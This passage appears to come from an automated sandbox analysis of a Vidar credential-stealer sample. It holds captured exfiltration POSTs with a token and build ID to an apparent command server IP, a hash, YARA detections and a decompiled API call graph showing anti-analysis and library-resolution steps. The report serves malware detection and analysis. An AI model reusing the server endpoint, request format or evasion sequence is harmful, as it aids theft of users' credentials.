                                                                                                                                                                                                            2024-10-23 05:04:04 UTC16355OUTData Raw: 68 2b 61 46 77 50 37 62 31 6d 31 76 6e 52 44 39 32 4e 53 75 35 54 36 66 76 57 6b 34 2f 32 42 57 6b 73 7a 6e 47 43 6c 79 37 2f 68 35 50 35 58 66 79 4d 49 5a 4a 54 6c 4f 55 4f 5a 72 6c 36 39 31 62 64 66 4f 79 36 6d 74 61 77 7a 33 71 4f 39 70 62 58 46 77 71 48 44 6d 47 46 6e 43 2f 58 41 34 71 46 5a 56 66 79 39 6d 35 76 4e 66 79 34 39 71 6b 37 33 34 2b 55 65 70 35 48 48 75 4b 77 39 4d 73 74 55 31 33 53 64 48 62 53 30 76 4c 69 4b 43 33 5a 4e 74 73 43 78 68 75 76 4e 62 63 58 77 50 6b 4a 47 77 68 6a 6a 67 44 6e 6a 69 66 7a 72 6a 55 76 45 75 6c 7a 36 65 48 6d 74 34 50 45 6b 38 31 31 4a 45 70 4b 49 6b 61 32 76 6d 79 45 39 41 6d 37 63 64 78 34 35 71 58 6d 72 53 54 73 74 66 30 64 76 38 41 67 6d 71 34 66 69 35 79 67 70 50 54 79 33 30 62 2f 53 78 72 71 77 59 5a 42 36
                                                                                                                                                                                                            Data Ascii: h+aFwP7b1m1vnRD92NSu5T6fvWk4/2BWksznGCly7/h5P5XfyMIZJTlOUOZrl691bdfOy6mtawz3qO9pbXFwqHDmGFnC/XA4qFZVfy9m5vNfy49qk734+Uep5HHuKw9MstU13SdHbS0vLiKC3ZNtsCxhuvNbcXwPkJGwhjjgDnjifzrjUvEulz6eHmt4PEk811JEpKIka2vmyE9Am7cdx45qXmrSTstf0dv8Agmq4fi5ygpPTy30b/SxrqwYZB6
                                                                                                                                                                                                            2024-10-23 05:04:04 UTC16355OUTData Raw: 4f 6c 42 51 6e 65 67 38 63 55 75 66 66 38 36 54 72 69 67 59 64 61 4f 39 46 4a 33 78 2f 4f 67 41 7a 36 30 68 78 2f 2b 71 6e 66 6d 4b 61 65 76 70 51 4d 44 7a 51 54 6d 6a 70 2f 6a 69 6a 38 36 41 4f 73 75 37 61 47 65 49 32 74 31 59 58 6b 71 70 63 79 58 4d 55 31 76 63 72 48 67 75 69 4b 51 56 4d 62 5a 48 79 41 38 45 64 61 67 69 73 62 75 57 38 69 31 42 56 65 32 75 72 57 43 33 6a 68 4a 62 64 38 30 4b 71 6f 62 6f 4f 75 33 4f 4b 33 71 4b 38 37 36 6a 53 35 2b 64 2b 76 36 48 68 2f 32 72 69 46 54 56 4e 62 4a 57 2f 47 2f 77 43 5a 68 79 57 69 79 57 38 39 70 5a 36 55 39 6e 39 71 49 57 64 33 6e 38 78 46 54 63 48 4b 52 44 61 4e 71 6c 67 50 76 46 6a 67 41 5a 36 35 61 74 72 63 78 33 75 68 7a 47 32 64 31 30 55 67 78 4b 5a 65 4a 63 53 74 4a 36 66 4c 31 78 33 36 66 68 57 39 52
                                                                                                                                                                                                            Data Ascii: OlBQneg8cUuff86TrigYdaO9FJ3x/OgAz60hx/+qnfmKaevpQMDzQTmjp/jij86AOsu7aGeI2t1YXkqpcyXMU1vcrHguiKQVMbZHyA8EdagisbuW8i1BVe2urWC3jhJbd80KqoboOu3OK3qK876jS5+d+v6Hh/2riFTVNbJW/G/wCZhyWiyW89pZ6U9n9qIWd3n8xFTcHKRDaNqlgPvFjgAZ65atrcx3uhzG2d10UgxKZeJcStJ6fL1x36fhW9R
                                                                                                                                                                                                            2024-10-23 05:04:04 UTC11151OUTData Raw: 59 55 6c 46 46 4d 41 70 4b 44 52 51 4d 44 53 55 55 6c 41 77 6f 4e 46 42 6f 47 4a 53 59 70 61 53 67 59 55 68 36 55 74 4e 6f 41 4b 4b 4b 44 51 55 4a 53 64 36 57 6b 4e 41 41 61 53 6c 70 4b 59 78 4b 4b 4b 4b 42 67 61 62 53 30 6c 41 78 44 52 52 32 6f 6f 47 4a 52 52 52 51 4d 53 6b 70 61 53 67 41 70 4b 57 6b 6f 4b 41 39 4b 62 54 6a 30 70 74 43 41 4b 53 6c 70 4b 42 68 53 55 74 4a 51 55 4a 52 52 52 51 41 55 30 30 70 70 4b 42 68 53 55 70 70 4b 42 69 55 48 70 52 52 51 4d 51 30 6c 4b 65 74 4a 51 4d 4b 54 71 61 58 76 53 55 44 45 36 66 34 55 55 55 6e 61 67 59 55 6c 4c 52 51 4d 54 70 36 30 6c 4c 53 5a 6f 47 47 50 38 6d 6b 7a 53 6a 72 53 47 67 41 6f 70 50 38 35 6f 6f 47 46 4a 32 34 70 61 51 39 4b 42 68 2f 6a 53 43 6c 50 35 55 6e 58 46 41 77 2b 6f 77 4b 54 72 53 6b 65 68
                                                                                                                                                                                                            Data Ascii: YUlFFMApKDRQMDSUUlAwoNFBoGJSYpaSgYUh6UtNoAKKKDQUJSd6WkNAAaSlpKYxKKKKBgabS0lAxDRR2ooGJRRRQMSkpaSgApKWkoKA9KbTj0ptCAKSlpKBhSUtJQUJRRRQAU00ppKBhSUppKBiUHpRRQMQ0lKetJQMKTqaXvSUDE6f4UUUnagYUlLRQMTp60lLSZoGGP8mkzSjrSGgAopP85ooGFJ24paQ9KBh/jSClP5UnXFAw+owKTrSkeh
                                                                                                                                                                                                            2024-10-23 05:04:06 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:04:06 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-10-23 05:04:06 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            23192.168.2.65001395.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:04:07 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJK
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:04:07 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 34 35 64 64 62 31 33 65 34 61 30 36 62 66 65 36 62 32 36 61 39 34 31 65 31 37 62 33 34 38 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 35 31 35 38 66 65 61 64 62 33 63 65 62 66 61 35 63 39 61 39 65 33 36 66 30 64 34 36 31 66 65 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                            Data Ascii: ------CFIEHCFIECBGCBFHIJJKContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------CFIEHCFIECBGCBFHIJJKContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------CFIEHCFIECBGCBFHIJJKCont
                                                                                                                                                                                                            2024-10-23 05:04:08 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:04:08 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-10-23 05:04:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            24192.168.2.65001495.217.220.1034436484C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-10-23 05:04:09 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----HCAAEGIJKEGHIDGCBAEB
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                            Host: 95.217.220.103
                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                            2024-10-23 05:04:09 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 34 35 64 64 62 31 33 65 34 61 30 36 62 66 65 36 62 32 36 61 39 34 31 65 31 37 62 33 34 38 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 35 31 35 38 66 65 61 64 62 33 63 65 62 66 61 35 63 39 61 39 65 33 36 66 30 64 34 36 31 66 65 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                            Data Ascii: ------HCAAEGIJKEGHIDGCBAEBContent-Disposition: form-data; name="token"5e45ddb13e4a06bfe6b26a941e17b348------HCAAEGIJKEGHIDGCBAEBContent-Disposition: form-data; name="build_id"65158feadb3cebfa5c9a9e36f0d461fe------HCAAEGIJKEGHIDGCBAEBCont
                                                                                                                                                                                                            2024-10-23 05:04:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Wed, 23 Oct 2024 05:04:09 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            2024-10-23 05:04:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                            Start time:01:02:03
                                                                                                                                                                                                            Start date:23/10/2024
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\7ZthFNAqYp.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:5'233'152 bytes
                                                                                                                                                                                                            MD5 hash:6733924C670207ED7755DC0FE2286C36
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                            Start time:01:02:16
                                                                                                                                                                                                            Start date:23/10/2024
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\7ZthFNAqYp.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\7ZthFNAqYp.exe"
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:5'233'152 bytes
                                                                                                                                                                                                            MD5 hash:6733924C670207ED7755DC0FE2286C36
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:5.1%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:5.7%
                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                              Total number of Limit Nodes:17
                                                                                                                                                                                                              execution_graph 73809 93863a 73810 93863c 73809->73810 73861 922b6a 73810->73861 73819 921284 25 API calls 73820 93866b 73819->73820 73821 921284 25 API calls 73820->73821 73822 938675 73821->73822 73976 92148a GetPEB 73822->73976 73824 93867f 73825 921284 25 API calls 73824->73825 73826 938689 73825->73826 73827 921284 25 API calls 73826->73827 73828 938693 73827->73828 73829 921284 25 API calls 73828->73829 73830 93869d 73829->73830 73977 9214a2 GetPEB 73830->73977 73832 9386a7 73833 921284 25 API calls 73832->73833 73834 9386b1 73833->73834 73835 921284 25 API calls 73834->73835 73836 9386bb 73835->73836 73837 921284 25 API calls 73836->73837 73838 9386c5 73837->73838 73978 9214f9 73838->73978 73841 921284 25 API calls 73842 9386d9 73841->73842 73843 921284 25 API calls 73842->73843 73844 9386e3 73843->73844 73845 921284 25 API calls 73844->73845 73846 9386ed 73845->73846 74001 921666 GetTempPathW 73846->74001 73849 921284 25 API calls 73850 9386fc 73849->73850 73851 921284 25 API calls 73850->73851 73852 938706 73851->73852 73853 921284 25 API calls 73852->73853 73854 938710 73853->73854 74013 9371cd 73854->74013 74438 9247e8 GetProcessHeap HeapAlloc 73861->74438 73864 9247e8 3 API calls 73865 922b95 73864->73865 73866 9247e8 3 API calls 73865->73866 73867 922bae 73866->73867 73868 9247e8 3 API calls 73867->73868 73869 922bc5 73868->73869 73870 9247e8 3 API calls 73869->73870 73871 922bdc 73870->73871 73872 9247e8 3 API calls 73871->73872 73873 922bf2 73872->73873 73874 9247e8 3 API calls 73873->73874 73875 922c09 73874->73875 73876 9247e8 3 API calls 73875->73876 73877 922c20 73876->73877 73878 9247e8 3 API calls 73877->73878 73879 922c3a 73878->73879 73880 9247e8 3 API calls 73879->73880 73881 922c51 73880->73881 73882 9247e8 3 API calls 73881->73882 73883 922c68 73882->73883 73884 9247e8 3 API calls 73883->73884 73885 922c7f 73884->73885 73886 9247e8 3 API calls 73885->73886 73887 922c95 73886->73887 73888 9247e8 3 API calls 73887->73888 73889 922cac 73888->73889 73890 9247e8 3 API calls 73889->73890 73891 922cc3 73890->73891 73892 9247e8 3 API calls 73891->73892 73893 922cda 73892->73893 73894 9247e8 3 API calls 73893->73894 73895 922cf4 73894->73895 73896 9247e8 3 API calls 73895->73896 73897 922d0b 73896->73897 73898 9247e8 3 API calls 73897->73898 73899 922d22 73898->73899 73900 9247e8 3 API calls 73899->73900 73901 922d39 73900->73901 73902 9247e8 3 API calls 73901->73902 73903 922d50 73902->73903 73904 9247e8 3 API calls 73903->73904 73905 922d67 73904->73905 73906 9247e8 3 API calls 73905->73906 73907 922d7e 73906->73907 73908 9247e8 3 API calls 73907->73908 73909 922d94 73908->73909 73910 9247e8 3 API calls 73909->73910 73911 922dae 73910->73911 73912 9247e8 3 API calls 73911->73912 73913 922dc5 73912->73913 73914 9247e8 3 API calls 73913->73914 73915 922ddc 73914->73915 73916 9247e8 3 API calls 73915->73916 73917 922df3 73916->73917 73918 9247e8 3 API calls 73917->73918 73919 922e09 73918->73919 73920 9247e8 3 API calls 73919->73920 73921 922e20 73920->73921 73922 9247e8 3 API calls 73921->73922 73923 922e37 73922->73923 73924 9247e8 3 API calls 73923->73924 73925 922e4e 73924->73925 73926 9247e8 3 API calls 73925->73926 73927 922e68 73926->73927 73928 9247e8 3 API calls 73927->73928 73929 922e7f 73928->73929 73930 9247e8 3 API calls 73929->73930 73931 922e96 73930->73931 73932 9247e8 3 API calls 73931->73932 73933 922eac 73932->73933 73934 9247e8 3 API calls 73933->73934 73935 922ec3 73934->73935 73936 9247e8 3 API calls 73935->73936 73937 922eda 73936->73937 73938 9247e8 3 API calls 73937->73938 73939 922eee 73938->73939 73940 9247e8 3 API calls 73939->73940 73941 922f05 73940->73941 73942 9387cf 73941->73942 74442 938726 GetPEB 73942->74442 73944 9387d5 73945 9389d0 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 73944->73945 73946 9387e5 73944->73946 73947 938a41 73945->73947 73948 938a2f GetProcAddress 73945->73948 73953 9387ff 20 API calls 73946->73953 73949 938a73 73947->73949 73950 938a4a GetProcAddress GetProcAddress 73947->73950 73948->73947 73951 938a8e 73949->73951 73952 938a7c GetProcAddress 73949->73952 73950->73949 73954 938a97 GetProcAddress 73951->73954 73955 938aa9 73951->73955 73952->73951 73953->73945 73954->73955 73956 938ab2 GetProcAddress GetProcAddress 73955->73956 73957 93864d 73955->73957 73956->73957 73958 9210f0 GetCurrentProcess VirtualAllocExNuma 73957->73958 73959 921111 ExitProcess 73958->73959 73960 921098 VirtualAlloc 73958->73960 73963 9210b8 _memset 73960->73963 73962 9210ec 73965 921284 73962->73965 73963->73962 73964 9210d5 VirtualFree 73963->73964 73964->73962 73966 9212ac _memset 73965->73966 73967 9212bb 13 API calls 73966->73967 74443 930c5a GetProcessHeap RtlAllocateHeap GetComputerNameA 73967->74443 73969 9213e9 74445 93d1a8 73969->74445 73973 9213b9 73973->73969 73975 9213e2 ExitProcess 73973->73975 73974 9213f4 73974->73819 73976->73824 73977->73832 74455 9214ad GetPEB 73978->74455 73981 9214ad 2 API calls 73982 921516 73981->73982 73983 9214ad 2 API calls 73982->73983 74000 9215a1 73982->74000 73984 921529 73983->73984 73985 9214ad 2 API calls 73984->73985 73984->74000 73986 921538 73985->73986 73987 9214ad 2 API calls 73986->73987 73986->74000 73988 921547 73987->73988 73989 9214ad 2 API calls 73988->73989 73988->74000 73990 921556 73989->73990 73991 9214ad 2 API calls 73990->73991 73990->74000 73992 921565 73991->73992 73993 9214ad 2 API calls 73992->73993 73992->74000 73994 921574 73993->73994 73995 9214ad 2 API calls 73994->73995 73994->74000 73996 921583 73995->73996 73997 9214ad 2 API calls 73996->73997 73996->74000 73998 921592 73997->73998 73999 9214ad 2 API calls 73998->73999 73998->74000 73999->74000 74000->73841 74002 9216a4 wsprintfW 74001->74002 74003 9217f7 74001->74003 74004 9216d0 CreateFileW 74002->74004 74005 93d1a8 setSBUpLow 5 API calls 74003->74005 74004->74003 74006 9216fb GetProcessHeap RtlAllocateHeap _time64 srand rand 74004->74006 74007 921807 74005->74007 74011 921754 _memset 74006->74011 74007->73849 74008 921733 WriteFile 74008->74003 74008->74011 74009 921768 CloseHandle CreateFileW 74009->74003 74010 92179e ReadFile 74009->74010 74010->74003 74010->74011 74011->74003 74011->74008 74011->74009 74012 9217c3 GetProcessHeap RtlFreeHeap CloseHandle 74011->74012 74012->74003 74012->74004 74014 9371dd 74013->74014 74459 9304bc 74014->74459 74018 93720c 74464 9305de lstrlenA 74018->74464 74021 9305de 3 API calls 74022 937231 74021->74022 74023 9305de 3 API calls 74022->74023 74024 93723a 74023->74024 74468 930562 74024->74468 74026 937246 74027 93726f OpenEventA 74026->74027 74028 937282 CreateEventA 74027->74028 74029 937268 CloseHandle 74027->74029 74030 9304bc lstrcpyA 74028->74030 74029->74027 74031 9372aa 74030->74031 74472 93051e lstrlenA 74031->74472 74034 93051e 2 API calls 74035 937311 74034->74035 74476 922f12 74035->74476 74038 938ade 121 API calls 74039 937456 74038->74039 74040 9304bc lstrcpyA 74039->74040 74243 93770b 74039->74243 74042 937471 74040->74042 74044 9305de 3 API calls 74042->74044 74046 937483 74044->74046 74045 930562 lstrcpyA 74047 93773b 74045->74047 74048 930562 lstrcpyA 74046->74048 74050 9304bc lstrcpyA 74047->74050 74049 93748c 74048->74049 74052 9305de 3 API calls 74049->74052 74051 937752 74050->74051 74053 9305de 3 API calls 74051->74053 74055 9374a7 74052->74055 74054 937765 74053->74054 75048 93059c 74054->75048 74057 930562 lstrcpyA 74055->74057 74059 9374b0 74057->74059 74061 9305de 3 API calls 74059->74061 74060 930562 lstrcpyA 74064 93777e 74060->74064 74062 9374cb 74061->74062 74063 930562 lstrcpyA 74062->74063 74065 9374d4 74063->74065 74066 937790 CreateDirectoryA 74064->74066 74069 9305de 3 API calls 74065->74069 75052 921cfd 74066->75052 74071 9374ef 74069->74071 74073 930562 lstrcpyA 74071->74073 74072 9377ba 75150 9383d9 74072->75150 74075 9374f8 74073->74075 74078 9305de 3 API calls 74075->74078 74076 9377cb 74077 930562 lstrcpyA 74076->74077 74079 9377e2 74077->74079 74080 937513 74078->74080 74081 930562 lstrcpyA 74079->74081 74082 930562 lstrcpyA 74080->74082 74083 9377f2 74081->74083 74084 93751c 74082->74084 75157 9304ee 74083->75157 74087 9305de 3 API calls 74084->74087 74089 937537 74087->74089 74088 9305de 3 API calls 74090 937811 74088->74090 74091 930562 lstrcpyA 74089->74091 74092 930562 lstrcpyA 74090->74092 74093 937540 74091->74093 74094 93781a 74092->74094 74095 9305de 3 API calls 74093->74095 74096 93059c 2 API calls 74094->74096 74097 93755b 74095->74097 74098 937837 74096->74098 74099 930562 lstrcpyA 74097->74099 74100 930562 lstrcpyA 74098->74100 74102 937564 74099->74102 74101 937840 74100->74101 74103 937849 InternetOpenA InternetOpenA 74101->74103 74105 9305de 3 API calls 74102->74105 74104 9304ee lstrcpyA 74103->74104 74106 937893 74104->74106 74107 93757f 74105->74107 74108 9304bc lstrcpyA 74106->74108 74109 930562 lstrcpyA 74107->74109 74111 9378a2 74108->74111 74110 937588 74109->74110 74114 9305de 3 API calls 74110->74114 75161 930977 GetWindowsDirectoryA 74111->75161 74116 9375a3 74114->74116 74115 9304ee lstrcpyA 74117 9378bd 74115->74117 74118 930562 lstrcpyA 74116->74118 75179 924b2e 74117->75179 74120 9375ac 74118->74120 74124 9305de 3 API calls 74120->74124 74123 9378d0 74125 9304bc lstrcpyA 74123->74125 74126 9375c7 74124->74126 74127 937905 74125->74127 74128 930562 lstrcpyA 74126->74128 74129 921cfd lstrcpyA 74127->74129 74130 9375d0 74128->74130 74131 937916 74129->74131 74134 9305de 3 API calls 74130->74134 75329 925f39 74131->75329 74135 9375eb 74134->74135 74137 930562 lstrcpyA 74135->74137 74139 9375f4 74137->74139 74138 93792e 74140 9304bc lstrcpyA 74138->74140 74143 9305de 3 API calls 74139->74143 74141 937942 74140->74141 74142 921cfd lstrcpyA 74141->74142 74144 93794c 74142->74144 74145 93760f 74143->74145 74146 925f39 43 API calls 74144->74146 74147 930562 lstrcpyA 74145->74147 74148 937958 74146->74148 74149 937618 74147->74149 75502 933299 strtok_s 74148->75502 74154 9305de 3 API calls 74149->74154 74151 93796b 74152 9304bc lstrcpyA 74151->74152 74153 93797e 74152->74153 74155 921cfd lstrcpyA 74153->74155 74156 937633 74154->74156 74157 93798f 74155->74157 74158 930562 lstrcpyA 74156->74158 74159 925f39 43 API calls 74157->74159 74161 93763c 74158->74161 74160 93799b 74159->74160 75511 9333d0 strtok_s 74160->75511 74163 9305de 3 API calls 74161->74163 74165 937657 74163->74165 74164 9379ae 74166 921cfd lstrcpyA 74164->74166 74167 930562 lstrcpyA 74165->74167 74168 9379bf 74166->74168 74169 937660 74167->74169 75518 933bc6 74168->75518 74173 9305de 3 API calls 74169->74173 74171 9379c4 74172 9304ee lstrcpyA 74171->74172 74174 9379d5 74172->74174 74175 93767b 74173->74175 74176 9304bc lstrcpyA 74174->74176 74178 930562 lstrcpyA 74175->74178 74177 9379e3 74176->74177 74180 937684 74178->74180 74184 9305de 3 API calls 74180->74184 74186 93769f 74184->74186 74188 930562 lstrcpyA 74186->74188 74189 9376a8 74188->74189 74196 9305de 3 API calls 74189->74196 74200 9376c3 74196->74200 74204 930562 lstrcpyA 74200->74204 74208 9376cc 74204->74208 74219 9305de 3 API calls 74208->74219 74223 9376e7 74219->74223 74227 930562 lstrcpyA 74223->74227 74231 9376f0 74227->74231 75031 932554 74231->75031 75040 931c1f 74243->75040 74248 93cdfd 10 API calls 74248->74243 74439 92480f 74438->74439 74441 922b7e 74438->74441 74440 924818 lstrlenA 74439->74440 74440->74440 74440->74441 74441->73864 74442->73944 74444 921385 74443->74444 74444->73969 74453 930c28 GetProcessHeap HeapAlloc GetUserNameA 74444->74453 74446 93d1b2 IsDebuggerPresent 74445->74446 74447 93d1b0 74445->74447 74454 93db05 74446->74454 74447->73974 74450 93d5f2 SetUnhandledExceptionFilter UnhandledExceptionFilter 74451 93d617 GetCurrentProcess TerminateProcess 74450->74451 74452 93d60f __call_reportfault 74450->74452 74451->73974 74452->74451 74453->73973 74454->74450 74458 9214e9 74455->74458 74456 9214d9 lstrcmpiW 74457 9214ef 74456->74457 74456->74458 74457->73981 74457->74000 74458->74456 74458->74457 74460 9304c7 74459->74460 74461 9304e8 74460->74461 74462 9304de lstrcpyA 74460->74462 74463 930c28 GetProcessHeap HeapAlloc GetUserNameA 74461->74463 74462->74461 74463->74018 74466 930605 74464->74466 74465 93062b 74465->74021 74466->74465 74467 930618 lstrcpyA lstrcatA 74466->74467 74467->74465 74469 930571 74468->74469 74470 930598 74469->74470 74471 930590 lstrcpyA 74469->74471 74470->74026 74471->74470 74473 930533 74472->74473 74474 93055c 74473->74474 74475 930552 lstrcpyA 74473->74475 74474->74034 74475->74474 74477 9247e8 3 API calls 74476->74477 74478 922f27 74477->74478 74479 9247e8 3 API calls 74478->74479 74480 922f3e 74479->74480 74481 9247e8 3 API calls 74480->74481 74482 922f55 74481->74482 74483 9247e8 3 API calls 74482->74483 74484 922f6c 74483->74484 74485 9247e8 3 API calls 74484->74485 74486 922f85 74485->74486 74487 9247e8 3 API calls 74486->74487 74488 922f9c 74487->74488 74489 9247e8 3 API calls 74488->74489 74490 922fb3 74489->74490 74491 9247e8 3 API calls 74490->74491 74492 922fca 74491->74492 74493 9247e8 3 API calls 74492->74493 74494 922fe4 74493->74494 74495 9247e8 3 API calls 74494->74495 74496 922ffb 74495->74496 74497 9247e8 3 API calls 74496->74497 74498 923011 74497->74498 74499 9247e8 3 API calls 74498->74499 74500 923028 74499->74500 74501 9247e8 3 API calls 74500->74501 74502 92303f 74501->74502 74503 9247e8 3 API calls 74502->74503 74504 923056 74503->74504 74505 9247e8 3 API calls 74504->74505 74506 92306d 74505->74506 74507 9247e8 3 API calls 74506->74507 74508 923084 74507->74508 74509 9247e8 3 API calls 74508->74509 74510 92309b 74509->74510 74511 9247e8 3 API calls 74510->74511 74512 